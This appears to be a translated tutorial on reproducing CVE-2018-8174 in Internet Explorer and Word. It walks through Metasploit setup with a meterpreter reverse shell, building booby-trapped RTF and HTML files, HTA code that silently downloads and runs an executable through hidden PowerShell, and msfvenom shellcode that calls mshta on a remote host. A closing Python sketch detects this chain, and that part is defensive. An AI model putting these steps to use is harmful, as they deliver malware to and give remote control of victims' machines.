2025-01-19 Update From: SLTechnology News&Howtos
Shulou(Shulou.com)05/31 Report--
This article describes how to reproduce the 0day vulnerability CVE-2018-8174. Many people may not know much about it, so the editor has summarized the steps below.
POC verification
If the system is not patched, the calculator pops up when the IE browser opens this address:
http://test.lr3800.com/CVE-2018-8174_PoC.html
Metasploit reproduction
Download the Metasploit module locally
git clone https://github.com/0x09AL/CVE-2018-8174-msf.git
Copy CVE-2018-8174.rb to the fileformat directory
cp CVE-2018-8174.rb /usr/share/metasploit-framework/modules/exploits/windows/fileformat/
Copy CVE-2018-8174.rtf to the exploits directory
cp CVE-2018-8174.rtf /usr/share/metasploit-framework/data/exploits/
Start Metasploit
use exploit/windows/fileformat/CVE-2018-8174
set PAYLOAD windows/meterpreter/reverse_tcp
set srvhost 192.168.0.116
set lhost 192.168.0.116
exploit
Copy the msf.rtf file from the /root/.msf4/local/ directory to the target host and open it with Word.
Alternatively, opening http://192.168.0.116:8080 in the IE browser also yields a session.
Reproduction with a custom downloader
Use mshta to download a file from a remote server and execute it.
Please download the poc attachment first and use the link below: https://pan.baidu.com/s/14vP4CMdjEKkRdHBb7vLSHg password: ci8h
1. Construct the HTA file. When the HTA file is accessed, it triggers PowerShell to download a file to the temporary directory and execute it.
Prepare your xx.exe file and upload it to the site directory; suppose its address is http://xxx.com/xxx.exe
HTA code:
A=new ActiveXObject ("WScript.Shell"); a.run ('% SystemRoot%/system32/WindowsPowerShell/v1.0/powershell.exe-windowstyle hidden (new-object System.Net.WebClient). DownloadFile (\ 'http://xxx.com/xxx.exe\',\' c:/windows/temp/xxx.exe\'); window.close ()
Upload the file, named 8174.hta, to the site directory; suppose its address is http://xxx.lr3800.com/8174.hta
2. Use msfvenom to generate JS shellcode
msfvenom -p windows/exec cmd='mshta http://xxx.lr3800.com/8174.hta' -f js_le exitfunc=thread -a x86
Put the generated shellcode string in place of the code on line 166 of 8174poc.html
Upload the 8174poc.html file to the site directory; suppose its address is http://xxx.lr3800.com/8174poc.html
3. Generate Word documents
* Download the Python script and save it locally
git clone https://github.com/Yt1g3r/CVE-2018-8174_EXP.git
Run CVE-2018-8174.py
python CVE-2018-8174.py -u http://xxx.lr3800.com/8174poc.html -o exp.rtf
This produces the "exp.rtf" file in the directory. Opening it with Word downloads and executes the xx.exe file; opening http://xxx.lr3800.com/8174poc.html in the IE browser does the same.
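On the defensive side, the chain described above leaves a recognisable process trail: Word or IE starting mshta with a URL, then mshta starting a hidden PowerShell that calls DownloadFile into c:/windows/temp. The following detection sketch is an added example, not part of the original article; the event tuple layout, the rule names and the example.test host are assumptions, and the events are constructed.

```python
import re

# Constructed process-creation events: (parent image, image, command line).
# The tuple layout and the example.test host are assumptions for illustration.
EVENTS = [
    ("explorer.exe", "winword.exe", r'WINWORD.EXE /n "C:\Users\u\Desktop\exp.rtf"'),
    ("winword.exe", "mshta.exe", "mshta http://files.example.test/8174.hta"),
    ("mshta.exe", "powershell.exe",
     "powershell.exe -windowstyle hidden (new-object System.Net.WebClient)"
     ".DownloadFile('http://files.example.test/xxx.exe','c:/windows/temp/xxx.exe')"),
    ("explorer.exe", "mshta.exe", r"mshta.exe C:\Tools\inventory.hta"),
    ("cmd.exe", "powershell.exe", r"powershell.exe -File C:\Scripts\backup.ps1"),
]

OFFICE_OR_IE = {"winword.exe", "iexplore.exe"}
URL = re.compile(r"https?://", re.I)
HIDDEN = re.compile(r"-w(indowstyle)?\s+hidden", re.I)
DOWNLOAD = re.compile(r"downloadfile\s*\(", re.I)
TEMP_EXE = re.compile(r"[\\/]windows[\\/]temp[\\/][^'\"\s]+\.exe", re.I)

def classify(parent, image, cmdline):
    """Return the names of the rules that one process-creation event matches."""
    parent, image = parent.lower(), image.lower()
    hits = []
    # Word or IE should not normally start mshta against a remote URL.
    if image == "mshta.exe" and parent in OFFICE_OR_IE and URL.search(cmdline):
        hits.append("office_or_ie_spawns_mshta_url")
    if image == "powershell.exe":
        # An HTA calling WScript.Shell.Run shows up as a child of mshta.exe.
        if parent == "mshta.exe":
            hits.append("mshta_spawns_powershell")
        if HIDDEN.search(cmdline) and DOWNLOAD.search(cmdline):
            hits.append("hidden_powershell_download")
        if DOWNLOAD.search(cmdline) and TEMP_EXE.search(cmdline):
            hits.append("download_exe_to_windows_temp")
    return hits

def detect(events):
    """Map event index -> matched rule names, skipping events with no match."""
    findings = {}
    for i, (parent, image, cmdline) in enumerate(events):
        hits = classify(parent, image, cmdline)
        if hits:
            findings[i] = hits
    return findings

if __name__ == "__main__":
    for idx, rules in detect(EVENTS).items():
        print(idx, EVENTS[idx][1], rules)
```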